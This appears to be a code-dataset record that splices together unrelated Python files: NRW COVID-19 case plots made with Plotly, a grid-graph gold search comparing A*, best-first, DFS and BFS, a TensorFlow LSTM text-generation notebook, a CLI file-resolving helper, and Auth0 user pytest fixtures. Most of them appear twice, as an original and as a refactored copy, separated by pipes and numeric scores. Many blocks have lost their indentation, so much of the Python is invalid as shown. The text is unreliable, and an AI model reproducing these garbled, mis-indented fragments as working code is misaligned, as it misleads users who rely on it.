go.Scatter(
x=deaths_ts.index,
y=deaths_ts,
name="Todesfälle " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="black", width=4),
marker=dict(size=10),
hovertemplate="Todesfälle " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
last_update_date = max(confirmed_ts.index).strftime('%d. %B') #str(all_data_kommune.iloc[-1]['Last Update Day'].strftime('%d. %B'))
# ~ last_update_source = str(all_data_kommune.iloc[-1]['Source (Link)'])
fig.update_layout(
title="Coronafälle<br>" + kommune + " (Stand: " + last_update_date + ")",
xaxis_title="Datum",
yaxis_title="Fälle",
legend_orientation="h",
# disable dragmode for better mobile experience
dragmode=False,
font=dict(size=22),
xaxis_tickformat = '%d. %B'
)
# write plot to file
fig.write_html(kommune_short.lower()+'_temp.html',
include_plotlyjs=False,
full_html=False,
config={"displayModeBar": False,
"locale": "de"}
# ~ auto_open=True
)
filenames = ['header.html', kommune_short.lower()+'_temp.html', 'diff_plot_' + kommune_short.lower() + '_temp.html', 'footer.html']
with open(kommune_short.lower()+'.html', 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
os.system("rm *_temp.html") | plot_data.py | import plotly.graph_objects as go # plots
import pandas
import os
import locale
locale.setlocale(locale.LC_ALL, 'de_DE')
os.system("python plot_barchart.py")
confirmed_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_confirmed.csv")
recovered_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_recovered.csv")
deaths_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_deaths.csv")
confirmed_df = confirmed_df.set_index(['Kommune'], drop=True)
recovered_df = recovered_df.set_index(['Kommune'], drop=True)
deaths_df = deaths_df.set_index(['Kommune'], drop=True)
for kommune in confirmed_df.index.unique():
# create plot
fig = go.Figure()
kommune_short = str.split(kommune)[1].lower()
confirmed_ts = confirmed_df.loc[kommune, :].T
recovered_ts = recovered_df.loc[kommune, :].T
deaths_ts = deaths_df.loc[kommune, :].T
confirmed_ts.index = pandas.to_datetime(confirmed_ts.index)
recovered_ts.index = pandas.to_datetime(recovered_ts.index)
deaths_ts.index = pandas.to_datetime(deaths_ts.index)
fig.add_trace(
go.Scatter(
x=confirmed_ts.index,
y=confirmed_ts,
name="Infektionen " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="orange", width=4),
marker=dict(size=10),
hovertemplate="Infektionen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
go.Scatter(
x=recovered_ts.index,
y=recovered_ts,
name="Genesene " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="green", width=4),
marker=dict(size=10),
hovertemplate="genesen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
go.Scatter(
x=deaths_ts.index,
y=deaths_ts,
name="Todesfälle " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="black", width=4),
marker=dict(size=10),
hovertemplate="Todesfälle " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
last_update_date = max(confirmed_ts.index).strftime('%d. %B') #str(all_data_kommune.iloc[-1]['Last Update Day'].strftime('%d. %B'))
# ~ last_update_source = str(all_data_kommune.iloc[-1]['Source (Link)'])
fig.update_layout(
title="Coronafälle<br>" + kommune + " (Stand: " + last_update_date + ")",
xaxis_title="Datum",
yaxis_title="Fälle",
legend_orientation="h",
# disable dragmode for better mobile experience
dragmode=False,
font=dict(size=22),
xaxis_tickformat = '%d. %B'
)
# write plot to file
fig.write_html(kommune_short.lower()+'_temp.html',
include_plotlyjs=False,
full_html=False,
config={"displayModeBar": False,
"locale": "de"}
# ~ auto_open=True
)
filenames = ['header.html', kommune_short.lower()+'_temp.html', 'diff_plot_' + kommune_short.lower() + '_temp.html', 'footer.html']
with open(kommune_short.lower()+'.html', 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
os.system("rm *_temp.html") | 0.376165 | 0.189465 |
from Grafo import Grafo, Vertice, Aresta
import random
import pandas as pd
import numpy as np
from copy import deepcopy, copy
from Busca import Busca
# Criando o grafo e arestas
file = pd.read_csv(
"entrada8.txt", skiprows=1, delimiter='\t', header=None).applymap(str)
# matrixSize = int(file.readline(1).strip())
# print(file)
matrix = np.array(file)
print(matrix)
print("\n\n")
def checkValue(row, col):
    """Return True when (row, col) is inside the grid and not a wall."""
    rows = matrix.shape[0]
    cols = matrix.shape[1]
    if not (0 <= row < rows and 0 <= col < cols):
        return False
    # "1" marks a wall; "0" (free) and anything else (gold) are passable.
    return matrix[row][col] != "1"
grafo = Grafo()
# Salva os nodos que contem o ouro para a heuristica
ouro = list()
def adicionaVertice(row, col):
    """Create (or fetch) the vertex for cell (row, col).

    Returns None for wall cells; gold cells are also recorded in the
    global ``ouro`` list for the search heuristic.
    """
    # conteudo: 0 = livre, 1 = parede, 2 = ouro
    nome = str(row) + "." + str(col)
    celula = matrix[row][col]
    if celula == "1":
        # Walls never become vertices.
        return None
    if celula == "0":
        conteudo = 0
    else:
        conteudo = 2
        if nome not in ouro:
            ouro.append(nome)
    if grafo.verticeExiste(nome):
        return grafo.vertice(nome)
    v = Vertice(nome, {
        "conteudo": conteudo,
        "row": row,
        "col": col,
        "linhaReta": dict()
    })
    grafo.adicionaVertice(v)
    return v
# Build the grid graph: connect each free cell to its traversable
# 4-neighbourhood (left, right, up, down) with unit-weight edges.
for row in range(matrix.shape[0]):
    for col in range(matrix.shape[1]):
        v = adicionaVertice(row, col)
        # BUG FIX / idiom: compare to None with `is`, not `==`.
        if v is None:
            continue
        # The four duplicated neighbour stanzas collapsed into one loop;
        # the visiting order (left, right, up, down) is preserved.
        for nrow, ncol in ((row, col - 1), (row, col + 1),
                           (row - 1, col), (row + 1, col)):
            if checkValue(nrow, ncol):
                nome = str(nrow) + "." + str(ncol)
                if not grafo.verticeExiste(nome):
                    adicionaVertice(nrow, ncol)
                ar = grafo.conecta(v.nome, nome)
                ar.setPeso(1)
# Run a single search strategy from the start cell "0.0" and print a
# report (moves, gold found, score, move count), then restore the graph
# and the searcher's state so the next strategy starts clean.
# NOTE(review): the parameter ``busca`` shadows this function's own name;
# callers pass the Busca instance plus one of its bound search methods.
def busca(busca, metodo):
grafo.salvarGrafo()
metodo("0.0")
print(busca._movimento)
print("Ouro encontrado:")
print(busca._ouroEncontrado)
print("Pontuacao:")
print(busca._pontuacao)
print("Numero de movimentos:")
print(len(busca._movimento))
# Undo any mutations the search made to the graph.
grafo.restaurarGrafo()
busca.limpar()
# presumably re-applies the gold-based (Manhattan?) heuristic for the
# next run -- TODO confirm against Busca.manh
busca.manh(ouro)
# Report which cells hold gold, build the searcher, then run each
# strategy in turn (A*, best-first, DFS, BFS are invoked below).
print("Ouro:")
print(ouro)
print("\n\n")
b = Busca(grafo, matrix.shape[0])
# presumably precomputes the heuristic toward the gold cells -- TODO
# confirm against Busca.manh
b.manh(ouro)
print("A*:")
busca(b, b.Astar)
print("\n\nBest-First:")
busca(b, b.bestFirst)
print("\n\nDFS:")
busca(b, b.BuscaProfundidade)
print("\n\nBFS:")
busca(b, b.buscaLargura) | Main.py | from Grafo import Grafo, Vertice, Aresta
import random
import pandas as pd
import numpy as np
from copy import deepcopy, copy
from Busca import Busca
# Criando o grafo e arestas
file = pd.read_csv(
"entrada8.txt", skiprows=1, delimiter='\t', header=None).applymap(str)
# matrixSize = int(file.readline(1).strip())
# print(file)
matrix = np.array(file)
print(matrix)
print("\n\n")
def checkValue(row, col):
if row >= matrix.shape[0] or row < 0:
return False
elif col >= matrix.shape[1] or col < 0:
return False
val = matrix[row][col]
if val == "0":
return True
elif val == "1":
return False
else:
return True
grafo = Grafo()
# Salva os nodos que contem o ouro para a heuristica
ouro = list()
def adicionaVertice(row, col):
# 0 = livre
# 1 = parede
# 2 = ouro
value = 0
if matrix[row][col] == "0":
value = 0
elif matrix[row][col] == "1":
# Se for parede nem adiciona vertice
value = 1
return None
else:
if str(row) + "." + str(col) not in ouro:
ouro.append(str(row) + "." + str(col))
value = 2
if not grafo.verticeExiste(str(row) + "." + str(col)):
v = Vertice(
str(row) + "." + str(col), {
"conteudo": value,
"row": row,
"col": col,
"linhaReta": dict()
})
grafo.adicionaVertice(v)
return v
else:
return grafo.vertice(str(row) + "." + str(col))
# Build the grid graph: connect each free cell to its traversable
# 4-neighbourhood (left, right, up, down) with unit-weight edges.
for row in range(matrix.shape[0]):
    for col in range(matrix.shape[1]):
        v = adicionaVertice(row, col)
        # BUG FIX / idiom: compare to None with `is`, not `==`.
        if v is None:
            continue
        # The four duplicated neighbour stanzas collapsed into one loop;
        # the visiting order (left, right, up, down) is preserved.
        for nrow, ncol in ((row, col - 1), (row, col + 1),
                           (row - 1, col), (row + 1, col)):
            if checkValue(nrow, ncol):
                nome = str(nrow) + "." + str(ncol)
                if not grafo.verticeExiste(nome):
                    adicionaVertice(nrow, ncol)
                ar = grafo.conecta(v.nome, nome)
                ar.setPeso(1)
def busca(busca, metodo):
grafo.salvarGrafo()
metodo("0.0")
print(busca._movimento)
print("Ouro encontrado:")
print(busca._ouroEncontrado)
print("Pontuacao:")
print(busca._pontuacao)
print("Numero de movimentos:")
print(len(busca._movimento))
grafo.restaurarGrafo()
busca.limpar()
busca.manh(ouro)
print("Ouro:")
print(ouro)
print("\n\n")
b = Busca(grafo, matrix.shape[0])
b.manh(ouro)
print("A*:")
busca(b, b.Astar)
print("\n\nBest-First:")
busca(b, b.bestFirst)
print("\n\nDFS:")
busca(b, b.BuscaProfundidade)
print("\n\nBFS:")
busca(b, b.buscaLargura) | 0.175044 | 0.339472 |
# In[13]:
import helper
import numpy as np
from distutils.version import LooseVersion
import warnings
import tensorflow as tf
from tensorflow.contrib import seq2seq
# In[14]:
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
# 建立NN网络
# In[15]:
# Check TensorFlow Version
assert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer'
print('TensorFlow Version: {}'.format(tf.__version__))
# Check for a GPU
if not tf.test.gpu_device_name():
warnings.warn('No GPU found. Please use a GPU to train your neural network.')
else:
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
# In[16]:
def get_inputs():
    """Create the graph's input placeholders.

    :return: (input ids, target ids, learning-rate scalar) placeholders
    """
    inputs = tf.placeholder(tf.int32, [None, None], name='input')
    targets = tf.placeholder(tf.int32, [None, None], name='target')
    lr = tf.placeholder(tf.float32, name='learning_rate')
    return inputs, targets, lr
# In[17]:
def get_init_cell(batch_size, rnn_size):
    """Build a 2-layer LSTM cell and its zero initial state.

    :param batch_size: Size of batches
    :param rnn_size: Size of RNNs
    :return: Tuple (cell, initial state)
    """
    # BUG FIX: build a *separate* BasicLSTMCell per layer. The original
    # ``[lstm] * 2`` placed the same cell object in both layers, so
    # MultiRNNCell shared one set of weights/state across layers.
    layers = [tf.contrib.rnn.BasicLSTMCell(rnn_size) for _ in range(2)]
    cell = tf.contrib.rnn.MultiRNNCell(layers)
    initial_state = tf.identity(cell.zero_state(batch_size, tf.float32),
                                name='initial_state')
    return cell, initial_state
# In[18]:
def get_embed(input_data, vocab_size, embed_dim):
    """Look up trainable word embeddings for ``input_data``.

    :param input_data: 输入 word-id tensor.
    :param vocab_size: vocabulary size.
    :param embed_dim: embedding dimensionality.
    :return: Embedded input.
    """
    # Embeddings are learned from scratch (no pre-trained vectors),
    # initialized uniformly in [-1, 1).
    table = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1))
    return tf.nn.embedding_lookup(table, input_data)
# In[19]:
def build_rnn(cell, inputs):
    """Unroll ``cell`` dynamically over ``inputs``.

    :param cell: RNN Cell
    :param inputs: Input text data
    :return: Tuple (outputs, final state named 'final_state')
    """
    outputs, state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)
    # Name the state tensor so it can be fetched by name at inference time.
    return outputs, tf.identity(state, "final_state")
# In[20]:
def build_nn(cell, rnn_size, input_data, vocab_size, embed_dim):
    """Embed ``input_data``, run the RNN, and project to vocab logits.

    :param cell: RNN cell
    :param rnn_size: Size of rnns
    :param input_data: Input data
    :param vocab_size: Vocabulary size
    :param embed_dim: Number of embedding dimensions
    :return: Tuple (Logits, FinalState)
    """
    rnn_in = get_embed(input_data, vocab_size, embed_dim)
    rnn_out, final_state = build_rnn(cell, rnn_in)
    # Linear (no activation) projection to vocabulary-sized logits;
    # softmax is applied later by the loss / sampling code.
    logits = tf.contrib.layers.fully_connected(rnn_out, vocab_size,
                                               activation_fn=None)
    return logits, final_state
# In[21]:
def get_batches(int_text, batch_size, seq_length):
    """Split ``int_text`` into training batches of (input, target) pairs.

    :param int_text: Text with the words replaced by their ids
    :param batch_size: The size of batch
    :param seq_length: The length of sequence
    :return: ndarray of shape (n_batches, 2, batch_size, seq_length)
    """
    words_per_batch = batch_size * seq_length
    n_batches = len(int_text) // words_per_batch
    n_kept = n_batches * words_per_batch

    inputs = np.array(int_text[:n_kept])
    # Targets are the inputs shifted one step left. When the text is
    # consumed exactly, the final target wraps around to the first word.
    if len(int_text) > n_kept:
        targets = np.array(int_text[1:n_kept + 1])
    else:
        targets = np.roll(inputs, -1)  # places int_text[0] at the end

    x_rows = inputs.reshape(batch_size, -1)
    y_rows = targets.reshape(batch_size, -1)
    pairs = zip(np.split(x_rows, n_batches, axis=1),
                np.split(y_rows, n_batches, axis=1))
    return np.array([np.stack(pair) for pair in pairs])
# In[22]:
# Training hyperparameters.
num_epochs = 30
batch_size = 256
rnn_size = 512  # LSTM hidden-state size
embed_dim = 400  # word-embedding dimensionality
seq_length = 20  # tokens per training sequence
learning_rate = 0.002
# How often (in batches) to print training progress.
show_every_n_batches = 30
# Checkpoint save path.
save_dir = './save'
# In[23]:
# Build the training graph: placeholders -> embedding/RNN -> logits,
# plus loss, optimizer, and gradient clipping.
train_graph = tf.Graph()
with train_graph.as_default():
vocab_size = len(int_to_vocab)
input_text, targets, lr = get_inputs()
# Dynamic shape, so batch size / sequence length can vary per run.
input_data_shape = tf.shape(input_text)
cell, initial_state = get_init_cell(input_data_shape[0], rnn_size)
logits, final_state = build_nn(cell, rnn_size, input_text, vocab_size, embed_dim)
# Probabilities for generating words (used at sampling time).
probs = tf.nn.softmax(logits, name='probs')
# Sequence cross-entropy loss, uniform weight for every position.
cost = seq2seq.sequence_loss(
logits,
targets,
tf.ones([input_data_shape[0], input_data_shape[1]]))
# Optimizer
optimizer = tf.train.AdamOptimizer(lr)
# Gradient clipping to [-1, 1] to limit exploding gradients.
gradients = optimizer.compute_gradients(cost)
capped_gradients = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gradients if grad is not None]
train_op = optimizer.apply_gradients(capped_gradients)
# In[24]:
# Training loop.
batches = get_batches(int_text, batch_size, seq_length)
with tf.Session(graph=train_graph) as sess:
sess.run(tf.global_variables_initializer())
for epoch_i in range(num_epochs):
# Reset the RNN state at the start of each epoch.
state = sess.run(initial_state, {input_text: batches[0][0]})
for batch_i, (x, y) in enumerate(batches):
feed = {
input_text: x,
targets: y,
initial_state: state,
lr: learning_rate}
# Carry the final state over to the next batch (stateful training).
train_loss, state, _ = sess.run([cost, final_state, train_op], feed)
# Show every <show_every_n_batches> batches
if (epoch_i * len(batches) + batch_i) % show_every_n_batches == 0:
print('Epoch {:>3} Batch {:>4}/{} train_loss = {:.3f}'.format(
epoch_i,
batch_i,
len(batches),
train_loss))
# Save Model
saver = tf.train.Saver()
saver.save(sess, save_dir)
print('Model Trained and Saved')
# In[25]:
# Persist the parameters needed to reload the model for generation.
helper.save_params((seq_length, save_dir))
# In[ ]:
# In[13]:
import helper
import numpy as np
from distutils.version import LooseVersion
import warnings
import tensorflow as tf
from tensorflow.contrib import seq2seq
# In[14]:
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
# 建立NN网络
# In[15]:
# Check TensorFlow Version
assert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer'
print('TensorFlow Version: {}'.format(tf.__version__))
# Check for a GPU
if not tf.test.gpu_device_name():
warnings.warn('No GPU found. Please use a GPU to train your neural network.')
else:
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
# In[16]:
def get_inputs():
'''
输入初始化
'''
input_data = tf.placeholder(tf.int32,[None,None],name='input')
target_data = tf.placeholder(tf.int32,[None,None],name='target')
learning_rate = tf.placeholder(tf.float32,name='learning_rate')
return input_data, target_data, learning_rate
# In[17]:
def get_init_cell(batch_size, rnn_size):
    """Build a 2-layer LSTM cell and its zero initial state.

    :param batch_size: Size of batches
    :param rnn_size: Size of RNNs
    :return: Tuple (cell, initial state)
    """
    # BUG FIX: build a *separate* BasicLSTMCell per layer. The original
    # ``[lstm] * 2`` placed the same cell object in both layers, so
    # MultiRNNCell shared one set of weights/state across layers.
    layers = [tf.contrib.rnn.BasicLSTMCell(rnn_size) for _ in range(2)]
    cell = tf.contrib.rnn.MultiRNNCell(layers)
    initial_state = tf.identity(cell.zero_state(batch_size, tf.float32),
                                name='initial_state')
    return cell, initial_state
# In[18]:
def get_embed(input_data, vocab_size, embed_dim):
"""
word embedding 输入.
:param input_data: 输入.
:param vocab_size: 总词语数.
:param embed_dim: w2v 维数
:return: Embedded input.
"""
#embedding 初始化,这边不采用预先训练的embeding,边训练边调参数
embedding = tf.Variable(tf.random_uniform((vocab_size,embed_dim),-1,1))
embed = tf.nn.embedding_lookup(embedding,input_data)
return embed
# In[19]:
def build_rnn(cell, inputs):
"""
:param cell: RNN Cell
:param inputs: Input text data
:return: Tuple (Outputs, Final State)
"""
Outputs,Finalstate = tf.nn.dynamic_rnn(cell,inputs,dtype=tf.float32)
Final_state = tf.identity(Finalstate,"final_state")
return Outputs,Final_state
# In[20]:
def build_nn(cell, rnn_size, input_data, vocab_size, embed_dim):
"""
:param cell: RNN cell
:param rnn_size: Size of rnns
:param input_data: Input data
:param vocab_size: Vocabulary size
:param embed_dim: Number of embedding dimensions
:return: Tuple (Logits, FinalState)
"""
embedding = get_embed(input_data,vocab_size,embed_dim)
lstm_output,final_state = build_rnn(cell,embedding)
#seq_output = tf.concat(lstm_output, axis=1)
#x = tf.reshape(seq_output,[-1,rnn_size])
#print(embedding.get_shape())
#print(lstm_output.get_shape())
#weights = tf.Variable(tf.truncated_normal([lstm_output.get_shape()[0].value,lstm_output.get_shape()[2].value,vocab_size], stddev=0.1))
#bias = tf.Variable(tf.zeros(vocab_size))
#print(weights.get_shape())
#logits = tf.matmul(lstm_output,weights)+ bias
logits = tf.contrib.layers.fully_connected(lstm_output,vocab_size,activation_fn=None)
return logits,final_state
# In[21]:
def get_batches(int_text, batch_size, seq_length):
"""
Return batches of input and target
:param int_text: Text with the words replaced by their ids
:param batch_size: The size of batch
:param seq_length: The length of sequence
:return: Batches as a Numpy array
"""
batch_output = []
characters_per_batch = seq_length*batch_size
#print(characters_per_batch)
batch_num = len(int_text)//characters_per_batch
x_full_seqs = np.array(int_text[:batch_num*characters_per_batch])
y_full_seqs = np.zeros_like(x_full_seqs)
#bound limit
if len(int_text) > batch_num*characters_per_batch:
y_full_seqs = int_text[1:batch_num*characters_per_batch + 1]
else:
y_full_seqs[:-1],y_full_seqs[-1] = int_text[1:batch_num*characters_per_batch],int_text[0]
#reshape
x_reshape = np.reshape(x_full_seqs,(batch_size,-1))
y_reshape = np.reshape(y_full_seqs,(batch_size,-1))
# print(x_reshape)
# print(batch_num)
#individual batches
x_bathes = np.split(x_reshape,batch_num,1)
y_bathes = np.split(y_reshape,batch_num,1)
# print(x_bathes[0])
# print(y_bathes[0])
for i in range(batch_num):
batch_output.append(np.stack((x_bathes[i],y_bathes[i])))
return np.array(batch_output)
# In[22]:
#设置各种超参数
num_epochs = 30
batch_size = 256
rnn_size = 512
embed_dim = 400
seq_length = 20
learning_rate = 0.002
#打印间隔
show_every_n_batches = 30
#保存路径
save_dir = './save'
# In[23]:
#build the graph
train_graph = tf.Graph()
with train_graph.as_default():
vocab_size = len(int_to_vocab)
input_text, targets, lr = get_inputs()
input_data_shape = tf.shape(input_text)
cell, initial_state = get_init_cell(input_data_shape[0], rnn_size)
logits, final_state = build_nn(cell, rnn_size, input_text, vocab_size, embed_dim)
# Probabilities for generating words
probs = tf.nn.softmax(logits, name='probs')
# Loss function
cost = seq2seq.sequence_loss(
logits,
targets,
tf.ones([input_data_shape[0], input_data_shape[1]]))
# Optimizer
optimizer = tf.train.AdamOptimizer(lr)
# Gradient Clipping
gradients = optimizer.compute_gradients(cost)
capped_gradients = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gradients if grad is not None]
train_op = optimizer.apply_gradients(capped_gradients)
# In[24]:
#训练
batches = get_batches(int_text, batch_size, seq_length)
with tf.Session(graph=train_graph) as sess:
sess.run(tf.global_variables_initializer())
for epoch_i in range(num_epochs):
state = sess.run(initial_state, {input_text: batches[0][0]})
for batch_i, (x, y) in enumerate(batches):
feed = {
input_text: x,
targets: y,
initial_state: state,
lr: learning_rate}
train_loss, state, _ = sess.run([cost, final_state, train_op], feed)
# Show every <show_every_n_batches> batches
if (epoch_i * len(batches) + batch_i) % show_every_n_batches == 0:
print('Epoch {:>3} Batch {:>4}/{} train_loss = {:.3f}'.format(
epoch_i,
batch_i,
len(batches),
train_loss))
# Save Model
saver = tf.train.Saver()
saver.save(sess, save_dir)
print('Model Trained and Saved')
# In[25]:
#参数保留
helper.save_params((seq_length, save_dir))
# In[ ]: | 0.571169 | 0.442757 |
from os import path
from bes.common.check import check
from bes.common.object_util import object_util
from bes.fs.file_check import file_check
from bes.fs.file_find import file_find
from bes.git.git import git
class cli_helper(object):
  'A class to help implement cli tools.'

  @classmethod
  def resolve_files(clazz, what, func = None):
    '''
    Return a sorted list of unique absolute filenames for what.
    'what' can be one or more of:
     - a file
     - a directory to search for files
    If given, 'func' is a predicate used to filter the resulting filenames.
    '''
    check.check_function(func, allow_none = True)
    if not what:
      return []
    what = object_util.listify(what)
    result = []
    for x in what:
      result.extend(clazz._resolve_one(x))
    result = sorted(set(result))
    if func:
      result = [ f for f in result if func(f) ]
    return result

  @classmethod
  def _resolve_one(clazz, filename):
    'Resolve one file or directory into a list of absolute filenames.'
    filename = path.abspath(filename)
    if path.isfile(filename):
      return [ filename ]
    elif path.isdir(filename):
      return file_find.find(filename, relative = False, file_type = file_find.FILE)
    if path.exists(filename):
      # Exists but is neither a regular file nor a directory (socket, device, ...)
      raise RuntimeError('File not a file or dir: {}'.format(filename))
    raise RuntimeError('File not found: {}'.format(filename))

  @classmethod
  def check_file(clazz, filename):
    'Raise if filename is not an existing file.'
    file_check.check_file(filename)

  @classmethod
  def check_dir(clazz, dirname):
    'Raise if dirname is not an existing directory.'
    file_check.check_dir(dirname)

  @classmethod
  def check_dir_is_git_repo(clazz, d):
    'Raise if d is not a git repository.'
    git.check_is_repo(d)

  @classmethod
  def resolve_file(clazz, filename, root_dir = None):
    '''
    Resolve a filename as follows:
    . when root_dir is given, join it with filename
    . otherwise expand ~ to $HOME and make the path absolute
    '''
    if root_dir:
      filename = path.join(root_dir, filename)
    else:
      if '~' in filename:
        filename = path.expanduser(filename)
      if not path.isabs(filename):
        filename = path.abspath(filename)
    return filename

  @classmethod
  def resolve_dir(clazz, dirname, root_dir = None):
    'Resolve a directory name; same rules as resolve_file().'
    return clazz.resolve_file(dirname, root_dir = root_dir)

  @classmethod
  def filter_keywords_args(clazz, clazz_for_instance, kargs):
    '''
    Return a deep copy of kargs with every key that names a public
    attribute of a clazz_for_instance instance removed.
    '''
    import copy  # local import: copy was used but never imported at file level
    check.check_class(clazz_for_instance)  # bug fix: was checking clazz, which is always a class
    instance = clazz_for_instance()
    fields = [ field for field in dir(instance) if not field.startswith('_') ]
    copied_args = copy.deepcopy(kargs)
    for field in fields:
      if field in copied_args:
        del copied_args[field]
    return copied_args
from os import path
from bes.common.check import check
from bes.common.object_util import object_util
from bes.fs.file_check import file_check
from bes.fs.file_find import file_find
from bes.git.git import git
class cli_helper(object):
  'A class to help implement cli tools.'

  @classmethod
  def resolve_files(clazz, what, func = None):
    '''
    Return a sorted list of unique absolute filenames for what.
    'what' can be one or more of:
     - a file
     - a directory to search for files
    If given, 'func' is a predicate used to filter the resulting filenames.
    '''
    check.check_function(func, allow_none = True)
    if not what:
      return []
    what = object_util.listify(what)
    result = []
    for x in what:
      result.extend(clazz._resolve_one(x))
    result = sorted(set(result))
    if func:
      result = [ f for f in result if func(f) ]
    return result

  @classmethod
  def _resolve_one(clazz, filename):
    'Resolve one file or directory into a list of absolute filenames.'
    filename = path.abspath(filename)
    if path.isfile(filename):
      return [ filename ]
    elif path.isdir(filename):
      return file_find.find(filename, relative = False, file_type = file_find.FILE)
    if path.exists(filename):
      # Exists but is neither a regular file nor a directory (socket, device, ...)
      raise RuntimeError('File not a file or dir: {}'.format(filename))
    raise RuntimeError('File not found: {}'.format(filename))

  @classmethod
  def check_file(clazz, filename):
    'Raise if filename is not an existing file.'
    file_check.check_file(filename)

  @classmethod
  def check_dir(clazz, dirname):
    'Raise if dirname is not an existing directory.'
    file_check.check_dir(dirname)

  @classmethod
  def check_dir_is_git_repo(clazz, d):
    'Raise if d is not a git repository.'
    git.check_is_repo(d)

  @classmethod
  def resolve_file(clazz, filename, root_dir = None):
    '''
    Resolve a filename as follows:
    . when root_dir is given, join it with filename
    . otherwise expand ~ to $HOME and make the path absolute
    '''
    if root_dir:
      filename = path.join(root_dir, filename)
    else:
      if '~' in filename:
        filename = path.expanduser(filename)
      if not path.isabs(filename):
        filename = path.abspath(filename)
    return filename

  @classmethod
  def resolve_dir(clazz, dirname, root_dir = None):
    'Resolve a directory name; same rules as resolve_file().'
    return clazz.resolve_file(dirname, root_dir = root_dir)

  @classmethod
  def filter_keywords_args(clazz, clazz_for_instance, kargs):
    '''
    Return a deep copy of kargs with every key that names a public
    attribute of a clazz_for_instance instance removed.
    '''
    import copy  # local import: copy was used but never imported at file level
    check.check_class(clazz_for_instance)  # bug fix: was checking clazz, which is always a class
    instance = clazz_for_instance()
    fields = [ field for field in dir(instance) if not field.startswith('_') ]
    copied_args = copy.deepcopy(kargs)
    for field in fields:
      if field in copied_args:
        del copied_args[field]
    return copied_args
import logging

import pytest

from test_app.models import Auth0User
from tests.utils.auth0 import (
    create_auth0_users_and_confirm,
    delete_all_auth0_users as delete_all_auth0_users_via_api,
    delete_all_auth0_users_with_confirmation,
    pause_and_confirm_total_auth0_users,
)

logger = logging.getLogger(__name__)

# Seconds to wait for Auth0's eventually-consistent user list to settle.
DELAY = 15

# TODO: Refactor/Remove these fixtures as I'm not testing things the same way anymore.


@pytest.fixture(scope="class")
def one_auth0_user(request):
    """
    Pytest fixture providing one Auth0 user for testing.

    Create a new user in Auth0 and add it to the class of our requesting test
    case class at runtime.  This is a little different than most pytest
    fixtures because we are working around the fact that we are using
    SeleniumTestCase for some tests, which as a subclass of TestCase cannot
    use normal pytest fixture based parametrization.

    :param request: the pytest fixture request object
    """
    users = create_auth0_users_and_confirm(1)
    request.cls.user = users[0]


@pytest.fixture(scope='function')
def delete_all_auth0_users():
    """Delete every Auth0 user before and after the test."""
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()
    yield
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()


@pytest.fixture(scope='function')
def delete_all_django_users():
    """Delete every Django Auth0User object before and after the test."""
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    yield
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()


@pytest.fixture(scope='function')
def cleanup_django_and_auth0():
    """Delete all Auth0 users and Django user objects before and after the test."""
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    yield
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()


def _provision_auth0_users(number_of_users, fixture_name):
    """
    Shared implementation for the N-user fixtures below.

    Wipes Auth0 and Django users, creates `number_of_users` confirmed Auth0
    users, yields to the test, then wipes everything again.
    """
    logger.info('Start of %s() fixture.', fixture_name)
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_with_confirmation()
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    create_auth0_users_and_confirm(number_of_users)
    pause_and_confirm_total_auth0_users(DELAY, number_of_users)
    yield
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_with_confirmation()
    logger.info('End of %s() fixture.', fixture_name)


@pytest.fixture(scope='function')
def one_user():
    """Provide exactly 1 confirmed Auth0 user (clean state before and after)."""
    yield from _provision_auth0_users(1, 'one_user')


@pytest.fixture(scope='function')
def five_users():
    """Provide exactly 5 confirmed Auth0 users (clean state before and after)."""
    yield from _provision_auth0_users(5, 'five_users')


@pytest.fixture(scope='function')
def ten_users():
    """Provide exactly 10 confirmed Auth0 users (clean state before and after)."""
    yield from _provision_auth0_users(10, 'ten_users')


@pytest.fixture(scope='function')
def with_33_auth0_users():
    """Provide exactly 33 confirmed Auth0 users (clean state before and after)."""
    # bug fix: previously logged 'ten_users' as the fixture name
    yield from _provision_auth0_users(33, 'with_33_auth0_users')


@pytest.fixture(scope='function')
def with_100_auth0_users():
    """Provide exactly 100 confirmed Auth0 users (clean state before and after)."""
    # bug fix: previously logged 'ten_users' as the fixture name
    yield from _provision_auth0_users(100, 'with_100_auth0_users')
